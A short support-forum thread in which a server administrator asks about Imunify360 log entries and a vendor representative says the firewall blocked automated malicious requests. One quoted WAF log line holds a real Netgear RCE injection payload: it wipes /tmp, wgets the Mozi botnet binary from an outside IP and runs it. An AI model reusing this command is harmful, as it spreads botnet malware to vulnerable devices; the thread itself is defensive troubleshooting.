Should I be concerned about these log entries?
Forum
  1. Forums
  2. Imunify360
  3. Imunify360 and Imunify Sensor
  1. Glenn Taylor
  2. Wednesday, 16 September 2020
  3.  Subscribe via email
- Anomaly detected in file '/tmp/#sql_80d_2.MAD'. Hidden from stats, but showing up on readdir. Possible kernel level rootkit.

There was a number of these log entries around the same time:

- IM360 WAF: Netgear unauthenticated RCE||T:APACHE||MVN:ARGS:cmd||MV:rm -rf /tmp/*;wget http://202.88.219.141:50021/Mozi.m -O /tmp/netgear;sh netgear||

I don’t see #sql_80d_2.MAD in /tmp

It looks kind of nasty.

Any insight would be appreciated.

Thx
G
Rate this post:
  1. 17.09.2020 10:09:42
  2. # 1
Sergey Khristich Accepted Answer
Posts: 461
Joined: 20.05.2019
0
Votes
Undo
Hello Glenn,
Thank you for reaching out! These log entries mean that malware requests come to your server in a random order, and the Imunify360 firewall blocks these requests. It does not mean that your server has been compromised.
You can also create a ticket https://cloudlinux.zendesk.com/hc/en-us/requests/new to check the infection of the server, and our malware analysts will be able to check for sure.
If you have any other questions, feel free to ask here. Thank you for contacting us.
Marketing Manager
  1. 17.09.2020 22:09:53
  2. # 2
Glenn Taylor Accepted Answer
Posts: 38
Joined: 23.04.2015
0
Votes
Undo
Thanks Sergey for your reply. My tech confirmed as well that it's nothing to worry about.
  • Page :
  • 1


There are no replies made for this post yet.
Be one of the first to reply to this post!
Guest
Submit Your Response
Upload files or images for this discussion by clicking on the upload button below. Supports gif,jpg,png,zip,rar,pdf
• Insert • Remove Upload Files (Maximum File Size: 2 MB)
Captcha
To protect the site from bots and unauthorized scripts, we require that you enter the captcha codes below before posting your question.